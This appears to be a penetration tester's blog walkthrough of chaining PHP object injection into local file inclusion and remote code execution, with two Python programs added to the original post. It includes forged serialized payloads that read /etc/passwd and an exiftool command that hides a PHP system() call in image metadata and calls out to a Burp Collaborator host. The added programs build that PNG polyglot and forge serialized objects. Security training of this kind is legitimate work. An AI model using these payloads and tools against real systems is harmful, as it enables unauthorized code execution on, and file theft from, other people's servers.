PHP Object Injection

Chaining vulnerabilities (PHP object injection to LFI to RCE)

Shadab Ahmed Ansari
4 min read · Jun 14, 2021

Hello everyone, I hope you are doing well and taking care of your health in this pandemic situation. Today I am going to walk you through a chain of vulnerabilities.

Recently, while pen-testing a web application, I found an interesting chain of vulnerabilities: PHP object injection leading to LFI (Local File Inclusion), which in turn leads to RCE (Remote Code Execution).

Let's quickly recap what LFI and RCE are.

What is LFI(Local File Inclusion)?

LFI is a web vulnerability that arises when an application builds the path for include(), require() or a similar file-loading call from user-controlled input without proper validation. If an LFI vulnerability exists, an attacker can make the application include files from the server's own filesystem. If the attacker can also get content of their choosing onto that filesystem, for example through an upload feature, the included file is executed as code by the application.

Risk

LFI can be dangerous, especially when combined with other vulnerabilities, for example when the attacker is able to upload files to the server: including an uploaded file that contains PHP code turns the LFI into code execution. Even if the attacker cannot upload files, LFI combined with directory traversal can be used to read sensitive files such as configuration files holding database credentials, or the application's source code.

What is RCE (Remote Code Execution)

Remote code execution means an attacker can make the target system execute code of their choosing from across the network, without legitimate access to it. It is not tied to any particular tool: against widely deployed software it is often exploited with automated scripts or scanners that target a known vulnerable version, but it is just as often found and exploited manually, as in this article, by chaining application-level flaws together.

Risk

Remote arbitrary code execution is usually aimed at taking control of the vulnerable system. In a web application the injected code first runs with the privileges of the web server or PHP process (for example www-data), which is already enough to read the application's source and database credentials, plant a web shell or pivot into the internal network; administrative access on the host then typically needs a further privilege-escalation step. Against off-the-shelf software the attack is often prefaced by information gathering, such as scanning to identify a vulnerable version, before a known exploit is run against it.

Let's move on to our attack scenario.

Attack Scenario

While analyzing the page, I noticed a parameter being passed in the URL whose value was base64-encoded.

Encoding and decoding the base64 data

Decoding the value with base64 showed that it was PHP serialized data. That is the classic precondition for PHP object injection: the application passes the decoded value to unserialize(), and the client controls every byte of it.

How do you tell that decoded data is PHP serialized? As shown in the figure below, serialize() output is a sequence of single-letter type tags, each followed by a length or a value:

O — an object; the number after it (8 in the figure) is the length in bytes of the class name that follows, and after the class name comes the number of properties

s — a string; the number after it (8 in the figure) is the length in bytes of the quoted string that follows

Other tags you will meet are i (integer), b (boolean), a (array) and N (null). The lengths are not decorative: unserialize() reads exactly that many bytes, so when you change a class name or a string you must update its length prefix as well, otherwise unserialize() returns false and the payload does nothing.

Deserialized object

I modified the decoded data so that the object's class became IncludeFile and its string property became /etc/passwd, updating both length prefixes to match (11 for IncludeFile, 11 for /etc/passwd), and base64-encoded the result again. unserialize() instantiates whatever class name appears in the data, so an application class whose magic methods (__wakeup, __destruct and so on) act on the object's properties becomes a gadget. Here the application evidently has a class named IncludeFile that includes the file named by its property, so sending the forged value makes the server include /etc/passwd.

Modified data with the LFI payload, base64-encoded

And it worked: the contents of /etc/passwd came back in the response, so we have LFI.

Leads to LFI (local file inclusion)

Now, the application also had a file upload feature, but it was restricted to image files such as jpeg, jpg and png.

In that scenario we can use ExifTool to embed our PHP payload in the metadata of a valid image. The file still starts with the image's magic bytes and keeps its image extension, so it passes the upload checks, but when PHP includes it the interpreter treats the binary image data as plain output and executes whatever sits between <?php and ?>.

I used a Debian-based Linux machine; install ExifTool with the command below:

sudo apt-get install exiftool

Once installed, take any image and write the payload into its Comment metadata tag. After the apt install, exiftool is on your PATH, so there is no need to copy the image into a tool directory; run the command from wherever the image is:

exiftool -Comment='<?php system("nslookup xxxxxxxxx.burpcollaborator.net"); ?>' imagename.png

Note the quoting: the whole PHP snippet is single-quoted for the shell, and the argument to system() is double-quoted inside it. ExifTool keeps a copy of the untouched file as imagename.png_original; confirm that the payload landed with exiftool -Comment imagename.png.

Here I am using the Burp Collaborator client, a tool for making use of Burp Collaborator during manual testing. You can use the Collaborator client to generate payloads for manual testing and poll the Collaborator server for any network interactions that result from them. The nslookup in the payload forces the target to resolve the Collaborator hostname, so a DNS lookup arriving at Collaborator proves the command ran even when the command's output never appears in the HTTP response.

Generating the payload inside the image
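As an added example (not code from the original post), here is the same trick done in Python instead of ExifTool, so you can see exactly what ends up in the file: a valid 1x1 PNG whose tEXt chunk with the keyword Comment carries the PHP payload, which is the same place the ExifTool command above puts it. The hostname is the placeholder from the command above, and the output filename imagename.png is an assumption.

```python
import struct
import zlib

# Placeholder hostname copied from the ExifTool command; replace it with your own
# Collaborator payload.
PHP_PAYLOAD = b'<?php system("nslookup xxxxxxxxx.burpcollaborator.net"); ?>'
PNG_SIGNATURE = b'\x89PNG\r\n\x1a\n'


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """PNG chunk: 4-byte big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xffffffff
    return struct.pack('>I', len(data)) + ctype + data + struct.pack('>I', crc)


def build_png_with_comment(comment: bytes) -> bytes:
    """Build a valid 1x1 RGB PNG whose tEXt 'Comment' chunk carries `comment`."""
    if b'\x00' in comment:
        raise ValueError('tEXt text may not contain NUL bytes')
    # IHDR: width, height, bit depth, colour type (2 = RGB), compression, filter, interlace
    ihdr = struct.pack('>IIBBBBB', 1, 1, 8, 2, 0, 0, 0)
    # One scanline: filter byte 0 followed by a single black RGB pixel
    idat = zlib.compress(b'\x00' + b'\x00\x00\x00')
    return (PNG_SIGNATURE
            + _chunk(b'IHDR', ihdr)
            + _chunk(b'tEXt', b'Comment\x00' + comment)   # keyword NUL text
            + _chunk(b'IDAT', idat)
            + _chunk(b'IEND', b''))


def is_png(data: bytes) -> bool:
    """What a naive upload filter checks: the magic bytes at offset 0."""
    return data.startswith(PNG_SIGNATURE)


def text_chunks(png: bytes) -> dict:
    """Walk the chunk list, verifying every CRC, and return {keyword: text} for tEXt chunks."""
    if not is_png(png):
        raise ValueError('not a PNG')
    out, pos = {}, len(PNG_SIGNATURE)
    while pos + 12 <= len(png):
        (length,) = struct.unpack('>I', png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack('>I', png[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + data) & 0xffffffff != crc:
            raise ValueError(f'bad CRC on {ctype!r} chunk')
        if ctype == b'tEXt':
            keyword, _, text = data.partition(b'\x00')
            out[keyword.decode('latin-1')] = text
        pos += 12 + length
        if ctype == b'IEND':
            break
    return out


def contains_php_tag(data: bytes) -> bool:
    """What PHP's include() cares about: an opening tag anywhere in the file (case-insensitive)."""
    return b'<?php' in data.lower()


if __name__ == '__main__':
    png = build_png_with_comment(PHP_PAYLOAD)
    with open('imagename.png', 'wb') as f:   # assumed output name
        f.write(png)
    print(text_chunks(png))
```

The file opens in any image viewer and passes a magic-byte or getimagesize()-style check, yet include() will execute the command. Two caveats: the binary bytes before the tag are echoed into the response as garbage, which is harmless for a DNS callback, and an upload pipeline that re-encodes images (for example through GD) strips metadata chunks and the payload with them, in which case the polyglot approach fails and you need another way to get PHP bytes to disk.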

Once the payload is ready, upload the image through the application's upload feature.

Uploading the image file

Once the file is uploaded, modify the serialized data again, this time with object = IncludeFile and string = the path of the uploaded image on the server (the upload response or the image link on the page usually reveals it), fix the length prefixes, and base64-encode the result.

Giving the path of the uploaded image
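Both modification steps in this write-up (swapping the class to IncludeFile and pointing its string at /etc/passwd, then pointing it at the uploaded image) are the same operation: decode, edit, recompute every length prefix, re-encode. The following is an added example written for this article, not the author's tooling, that does it with a small parser for serialize() syntax so the lengths can never be wrong, plus the triage check used earlier to recognise serialized data. The original class name PageView, the property name filename, its value home.php and the upload path /var/www/html/uploads/imagename.png are constructed assumptions standing in for the redacted values in the screenshots; IncludeFile is the class the write-up switches to.

```python
import base64
import binascii
import re

# Constructed sample parameter (class, property and value are assumptions).
SAMPLE_PARAM = base64.b64encode(
    b'O:8:"PageView":1:{s:8:"filename";s:8:"home.php";}'
).decode()


class PhpObject:
    def __init__(self, class_name: str, props: dict = None):
        self.class_name, self.props = class_name, props or {}


class _Reader:
    """Minimal recursive-descent parser for PHP serialize() output (O, s, i, b, N)."""

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def expect(self, token: bytes) -> None:
        if not self.data.startswith(token, self.pos):
            raise ValueError(f"expected {token!r} at offset {self.pos}")
        self.pos += len(token)

    def read_until(self, sep: bytes) -> bytes:
        end = self.data.index(sep, self.pos)
        out, self.pos = self.data[self.pos:end], end + len(sep)
        return out

    def read_string(self) -> str:
        # s:<len>:"<bytes>";  the length is a BYTE count and PHP trusts it,
        # so read exactly that many bytes instead of scanning for a quote.
        self.expect(b's:')
        length = int(self.read_until(b':'))
        self.expect(b'"')
        raw = self.data[self.pos:self.pos + length]
        if len(raw) != length:
            raise ValueError("declared string length runs past the input")
        self.pos += length
        self.expect(b'";')
        return raw.decode('utf-8')

    def read_value(self):
        tag = self.data[self.pos:self.pos + 1]
        if tag == b's':
            return self.read_string()
        if tag == b'i':
            self.expect(b'i:')
            return int(self.read_until(b';'))
        if tag == b'b':
            self.expect(b'b:')
            return self.read_until(b';') == b'1'
        if tag == b'N':
            self.expect(b'N;')
            return None
        if tag == b'O':
            return self.read_object()
        raise ValueError(f"unsupported type {tag!r} at offset {self.pos}")

    def read_object(self) -> PhpObject:
        # O:<len>:"<class>":<count>:{ <key><value> ... }
        self.expect(b'O:')
        name_len = int(self.read_until(b':'))
        self.expect(b'"')
        obj = PhpObject(self.data[self.pos:self.pos + name_len].decode('utf-8'))
        self.pos += name_len
        self.expect(b'":')
        count = int(self.read_until(b':'))
        self.expect(b'{')
        for _ in range(count):
            key = self.read_string()
            obj.props[key] = self.read_value()
        self.expect(b'}')
        return obj


def php_serialize(value) -> bytes:
    """Re-emit a value in serialize() syntax, recomputing every length prefix."""
    if isinstance(value, PhpObject):
        name = value.class_name.encode('utf-8')
        body = b''.join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return b'O:%d:"%s":%d:{%s}' % (len(name), name, len(value.props), body)
    if isinstance(value, bool):            # must precede int: bool is an int subclass
        return b'b:%d;' % int(value)
    if isinstance(value, int):
        return b'i:%d;' % value
    if value is None:
        return b'N;'
    raw = str(value).encode('utf-8')
    return b's:%d:"%s";' % (len(raw), raw)


def decode_param(param: str) -> bytes:
    return base64.b64decode(param, validate=True)


def looks_php_serialized(param: str) -> bool:
    """Triage for a URL parameter: base64 that decodes to serialize() syntax."""
    try:
        raw = decode_param(param)
    except (binascii.Error, ValueError):
        return False
    return re.match(rb'^(O:\d+:"[^"]+":\d+:\{|a:\d+:\{|s:\d+:")', raw) is not None


def forge_param(param: str, prop: str, new_value: str, class_name: str = None) -> str:
    """Decode, swap the class and/or one property, re-serialize with correct lengths, re-encode."""
    obj = _Reader(decode_param(param)).read_object()
    if prop not in obj.props:
        raise KeyError(f"no property {prop!r}; found {list(obj.props)}")
    if class_name:
        obj.class_name = class_name
    obj.props[prop] = new_value
    return base64.b64encode(php_serialize(obj)).decode()


if __name__ == '__main__':
    print(looks_php_serialized(SAMPLE_PARAM))
    # Step 1: switch to the IncludeFile gadget and read /etc/passwd
    print(forge_param(SAMPLE_PARAM, 'filename', '/etc/passwd', 'IncludeFile'))
    # Step 2: same gadget, pointed at the uploaded image (path is an assumption)
    print(forge_param(SAMPLE_PARAM, 'filename', '/var/www/html/uploads/imagename.png', 'IncludeFile'))
```

The parser deliberately reads string bodies by declared length rather than scanning for a closing quote, which is how unserialize() itself behaves and is why a hand-edited payload with a stale length silently fails.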

Then send the forged request and click the "Poll now" button in the Burp Collaborator client.

A DNS interaction from the target means nslookup ran on the server, so our exploitation is successful: we have command execution as the web server user.

Thank you for spending your precious time reading this article.

Stay tuned for more attacks.

Written by Shadab Ahmed Ansari, Senior Security Analyst | Penetration Tester